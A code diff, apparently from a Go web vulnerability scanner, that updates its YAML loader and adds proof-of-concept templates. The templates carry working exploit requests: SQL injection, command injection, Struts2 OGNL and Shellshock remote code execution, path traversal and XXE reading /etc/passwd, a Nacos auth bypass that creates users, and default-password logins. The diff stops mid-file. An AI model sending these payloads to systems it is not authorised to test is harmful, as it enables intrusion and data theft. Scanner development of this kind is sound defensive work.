 import (
 	"embed"
-	fmt "fmt"
-	proto "github.com/golang/protobuf/proto"
+	"fmt"
+	"github.com/golang/protobuf/proto"
 	"gopkg.in/yaml.v3"
-	math "math"
+	"io/ioutil"
+	"math"
 	"strings"
 )
 
+type Poc struct {
+	Name   string              `yaml:"name"`
+	Set    map[string]string   `yaml:"set"`
+	Sets   map[string][]string `yaml:"sets"`
+	Rules  []Rules             `yaml:"rules"`
+	Groups map[string][]Rules  `yaml:"groups"`
+	Detail Detail              `yaml:"detail"`
+}
+
+type Rules struct {
+	Method          string            `yaml:"method"`
+	Path            string            `yaml:"path"`
+	Headers         map[string]string `yaml:"headers"`
+	Body            string            `yaml:"body"`
+	Search          string            `yaml:"search"`
+	FollowRedirects bool              `yaml:"follow_redirects"`
+	Expression      string            `yaml:"expression"`
+}
+
+type Detail struct {
+	Author      string   `yaml:"author"`
+	Links       []string `yaml:"links"`
+	Description string   `yaml:"description"`
+	Version     string   `yaml:"version"`
+}
+
 // Reference imports to suppress errors if they are not otherwise used.
 var _ = proto.Marshal
 var _ = fmt.Errorf
@@ -356,50 +383,29 @@ var fileDescriptor_11b04836674e6f94 = []byte{
 	0xff, 0xff, 0x2a, 0xe0, 0x6d, 0x45, 0x24, 0x03, 0x00, 0x00,
 }
 
-type Poc struct {
-	Name   string              `yaml:"name"`
-	Set    map[string]string   `yaml:"set"`
-	Sets   map[string][]string `yaml:"sets"`
-	Rules  []Rules             `yaml:"rules"`
-	Detail Detail              `yaml:"detail"`
-}
-
-type Rules struct {
-	Method          string            `yaml:"method"`
-	Path            string            `yaml:"path"`
-	Headers         map[string]string `yaml:"headers"`
-	Body            string            `yaml:"body"`
-	Search          string            `yaml:"search"`
-	FollowRedirects bool              `yaml:"follow_redirects"`
-	Expression      string            `yaml:"expression"`
-}
-
-type Detail struct {
-	Author      string   `yaml:"author"`
-	Links       []string `yaml:"links"`
-	Description string   `yaml:"description"`
-	Version     string   `yaml:"version"`
-}
-
 func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
 	var pocs []*Poc
 	for _, f := range SelectPoc(Pocs, pocname) {
-		if p, err := loadPoc(f, Pocs); err == nil {
+		if p, err := LoadPoc(f, Pocs); err == nil {
 			pocs = append(pocs, p)
+		} else {
+			fmt.Println("[-] load poc ", f, " error:", err)
 		}
 	}
 	return pocs
 }
 
-func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
+func LoadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
 	p := &Poc{}
 	yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
 
 	if err != nil {
+		fmt.Printf("[-] load poc %s error: %v", fileName, err)
 		return nil, err
 	}
 	err = yaml.Unmarshal(yamlFile, p)
 	if err != nil {
+		fmt.Printf("[-] load poc %s error: %v", fileName, err)
 		return nil, err
 	}
 	return p, err
@@ -418,3 +424,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string {
 	}
 	return foundFiles
 }
+
+func LoadPocbyPath(fileName string) (*Poc, error) {
+	p := &Poc{}
+	data, err := ioutil.ReadFile(fileName)
+	if err != nil {
+		fmt.Printf("[-] load poc %s error: %v", fileName, err)
+		return nil, err
+	}
+	err = yaml.Unmarshal(data, p)
+	if err != nil {
+		fmt.Printf("[-] load poc %s error: %v", fileName, err)
+		return nil, err
+	}
+	return p, err
+}

WebScan/pocs/74cms-sqli-1.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-74cms-sqli-1
+set:
+  rand: randomInt(200000000, 210000000)
+rules:
+  - method: POST
+    path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
+    headers:
+      Content-Type: 'text/xml'
+    body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
+    follow_redirects: false
+    expression: |
+      response.body.bcontains(bytes(md5(string(rand))))
+detail:
+  author: betta(https://github.com/betta-cyber)
+  links:
+    - https://www.uedbox.com/post/29340

WebScan/pocs/74cms-sqli-2.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-74cms-sqli-2
+set:
+  rand: randomInt(200000000, 210000000)
+rules:
+  - method: GET
+    path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
+    expression: |
+      response.body.bcontains(bytes(md5(string(rand))))
+detail:
+  author: rexus
+  links:
+    - https://www.uedbox.com/post/30019/

WebScan/pocs/74cms-sqli.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-74cms-sqli
+rules:
+  - method: GET
+    path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
+    expression: |
+      response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
+detail:
+  author: jinqi
+  links:
+    - https://www.t00ls.net/articles-54436.html

WebScan/pocs/Hotel-Internet-Manage-RCE.yml

@@ -0,0 +1,15 @@
+name: Hotel-Internet-Manage-RCE
+rules:
+  - method: GET
+    path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
+    headers:
+      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
+      Accept-Encoding: "gzip,deflate"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"parent.doTestResult")
+detail:
+  author: test
+  Affected Version: "Hotel Internet Billing & Operation Support System"
+  links:
+    - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
+    

WebScan/pocs/Struts2-062-cve-2021-31805-rce.yml

@@ -0,0 +1,31 @@
+name: poc-yaml-struts2-062-cve-2021-31805-rce
+rules:
+  - method: POST
+    path: /
+    headers:
+      Content-Type: 'multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF'
+      Cache-Control: 'max-age=0'
+      Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
+
+    body: "\
+        ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\r\n\
+        Content-Disposition: form-data; name=\"id\"\r\n\r\n\
+        %{\r\n\
+        (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
+        (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\r\n\
+        (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
+        (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\r\n
+        (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
+        (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\r\n\
+        (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n\
+        (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n
+        (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\r\n
+        }\r\n\
+        ------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
+        "
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: Jaky
+  links:
+    - https://mp.weixin.qq.com/s/taEEl6UQ2yi4cqzs2UBfCg

WebScan/pocs/active-directory-certsrv-detect.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-active-directory-certsrv-detect
+rules:
+  - method: GET
+    path: /certsrv/certrqad.asp
+    follow_redirects: false
+    expression: |
+      response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM")
+detail:
+  author: AgeloVito
+  links:
+    - https://www.cnblogs.com/EasonJim/p/6859345.html

WebScan/pocs/airflow-unauth.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-airflow-unauth
+rules:
+  - method: GET
+    path: /admin/
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<title>Airflow - DAGs</title>") && response.body.bcontains(b"<h2>DAGs</h2>")
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  links:
+    - http://airflow.apache.org/

WebScan/pocs/alibaba-canal-default-password.yml

@@ -0,0 +1,19 @@
+name: poc-yaml-alibaba-canal-default-password
+rules:
+  - method: POST
+    path: /api/v1/user/login
+    expression: |
+      response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
+  - method: POST
+    path: /api/v1/user/login
+    headers:
+      Content-Type: application/json
+    body: >-
+      {"username":"admin","password":"123456"}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
+detail:
+  author: jweny(https://github.com/jweny)
+  links:
+    - https://www.cnblogs.com/xiexiandong/p/12888582.html

WebScan/pocs/alibaba-nacos-api-unauth.yml

@@ -1,15 +0,0 @@
-name: poc-yaml-alibaba-nacos-api-unauth
-rules:
-  - method: GET
-    path: /nacos/v1/auth/users?pageNo=1&pageSize=9
-    headers:
-      User-Agent: Nacos-Server
-    follow_redirects: true
-    expression: |
-      response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
-detail:
-  author: AgeloVito
-  info: alibaba-nacos-api-unauth
-  login: nacos/nacos
-  links:
-    - https://blog.csdn.net/caiqiiqi/article/details/112005424

WebScan/pocs/alibaba-nacos-v1-auth-bypass.yml

@@ -0,0 +1,27 @@
+name: poc-yaml-alibaba-nacos-v1-auth-bypass
+set:
+  r1: randomLowercase(16)
+  r2: randomLowercase(16)
+rules:
+  - method: POST
+    path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("create user ok!"))
+  - method: GET
+    path: "/nacos/v1/auth/users?pageNo=1&pageSize=999"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(r1))
+  - method: DELETE
+    path: "/nacos/v1/auth/users?username={{r1}}"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("delete user ok!"))
+detail:
+  author: kmahyyg(https://github.com/kmahyyg)
+  links:
+    - https://github.com/alibaba/nacos/issues/4593

WebScan/pocs/amtt-hiboss-server-ping-rce.yml

@@ -0,0 +1,18 @@
+name: poc-yaml-amtt-hiboss-server-ping-rce
+set:
+  r2: randomLowercase(10)
+rules:
+  - method: GET
+    path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
+    expression: |
+      response.status == 200 && response.body.bcontains(b"parent.doTestResult")
+  - method: GET
+    path: /{{r2}}.php
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(r2)))
+
+detail:
+  author: YekkoY
+  description: "安美数字-酒店宽带运营系统-远程命令执行漏洞"
+  links:
+    - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

WebScan/pocs/apache-ambari-default-password.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-apache-ambari-default-password
+rules:
+  - method: GET
+    path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
+    headers:
+      Authorization: Basic YWRtaW46YWRtaW4=
+    expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
+detail:
+    author: wulalalaaa(https://github.com/wulalalaaa)
+    links:
+        - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide

WebScan/pocs/apache-druid-cve-2021-36749.yml

@@ -0,0 +1,24 @@
+name: poc-yaml-apache-druid-cve-2021-36749
+manual: true
+transport: http
+groups:
+  druid1:
+  - method: POST
+    path: /druid/indexer/v1/sampler?for=connect
+    headers:
+      Content-Type: application/json;charset=utf-8
+    body: |
+      {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
+    expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
+  druid2:
+  - method: POST
+    path: /druid/indexer/v1/sampler?for=connect
+    headers:
+      Content-Type: application/json;charset=utf-8
+    body: |
+      {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
+    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: iak3ec(https://github.com/nu0l)
+  links:
+    - https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w

WebScan/pocs/apache-flink-upload-rce.yml

@@ -7,8 +7,7 @@ rules:
       path: /jars
       follow_redirects: true
       expression: >
-        response.status == 200 && response.content_type.contains("json") &&
-        response.body.bcontains(b"address") && response.body.bcontains(b"files")
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files")
     - method: POST
       path: /jars/upload
       headers:
@@ -23,8 +22,7 @@ rules:
 
       follow_redirects: true
       expression: >
-        response.status == 200 && response.content_type.contains("json") &&
-        response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
       search: >-
         (?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
     - method: DELETE

WebScan/pocs/apache-httpd-cve-2021-40438-ssrf.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
+manual: true
+transport: http
+rules:
+  - method: GET
+    path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
+    follow_redirects: false
+    expression: response.status == 302 && response.headers["Location"] == "http://www.baidu.com/search/error.html"
+detail:
+  author: Jarcis-cy(https://github.com/Jarcis-cy)
+  links:
+    - https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438

WebScan/pocs/apache-httpd-cve-2021-41773-path-traversal.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
+groups:
+  cgibin:
+    - method: GET
+      path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+  icons:
+    - method: GET
+      path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: JingLing(https://github.com/shmilylty)
+  links:
+    - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ

WebScan/pocs/apache-httpd-cve-2021-41773-rce.yml

@@ -0,0 +1,14 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-rce
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: POST
+    path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
+    body: echo;expr {{r1}} + {{r2}}
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773

WebScan/pocs/apache-kylin-unauth-cve-2020-13937.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-apache-kylin-unauth-cve-2020-13937
+rules:
+  - method: GET
+    path: /kylin/api/admin/config
+    expression: |
+      response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
+detail:
+  author: JingLing(github.com/shmilylty)
+  links:
+    - https://s.tencent.com/research/bsafe/1156.html

WebScan/pocs/apache-nifi-api-unauthorized-access.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-apache-nifi-api-unauthorized-access
+manual: true
+transport: http
+rules:
+  - method: GET
+    path: /nifi-api/flow/current-user
+    follow_redirects: false
+    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
+detail:
+    author: wulalalaaa(https://github.com/wulalalaaa)
+    links:
+        - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html

WebScan/pocs/apache-ofbiz-cve-2018-8033-xxe.yml

@@ -1,4 +1,4 @@
-name: poc-yaml-apacheofbiz-cve-2018-8033-xxe
+name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
 rules:
   - method: POST
     path: /webtools/control/xmlrpc
@@ -8,8 +8,8 @@ rules:
       <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
     follow_redirects: false
     expression: >
-      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml")
+      response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body)
 detail:
   author: su(https://suzzz112113.github.io/#blog)
   links:
-    - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
+    - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py

WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml

@@ -11,7 +11,7 @@ rules:
       version="1.0"?><methodCall><methodName>{{rand}}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
     follow_redirects: false
     expression: >
-      response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
 detail:
   author: su(https://suzzz112113.github.io/#blog)
   links:

WebScan/pocs/apache-solr-file-read.yml

@@ -1,21 +0,0 @@
-name: poc-yaml-apache-solr-file-read
-rules:
-  - method: GET
-    path: "/solr/admin/cores?indexInfo=false&wt=json"
-    search: |
-      "name":"(?P<core_name>.+?)",
-    expression:
-      response.status == 200
-  - method: POST
-    path: "/solr/{{core_name}}/config"
-    headers:
-      Content-type: application/json
-    body: |
-      {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
-    expression: |
-      response.status == 200 && response.body.bcontains(b"This")
-detail:
-  author: flyinbed
-  links:
-    - "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg"
-    - "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ"

WebScan/pocs/aspcms-backend-leak.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-aspcms-backend-leak
+rules:
+  - method: GET
+    path: /plug/oem/AspCms_OEMFun.asp
+    expression: |
+      response.status == 200 && "<script>alert".bmatches(response.body) && "top.location.href='(.*?)';".bmatches(response.body)
+    search: >-
+        (?P<path>(/(.*?).asp))
+  - method: GET
+    path: /{{path}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"username")
+detail:
+  author: Hzllaga
+  links:
+    - https://www.onebug.org/wooyundata/65458.html

WebScan/pocs/bash-cve-2014-6271.yml

@@ -0,0 +1,14 @@
+name: poc-yaml-bash-cve-2014-6271
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    headers:
+      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
+    follow_redirects: false
+    expression: response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: neal1991(https://github.com/neal1991)
+  links:
+    - https://github.com/opsxcq/exploit-CVE-2014-6271

WebScan/pocs/cacti-weathermap-file-write.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-cacti-weathermap-file-write
+rules:
+  - method: GET
+    path: >-
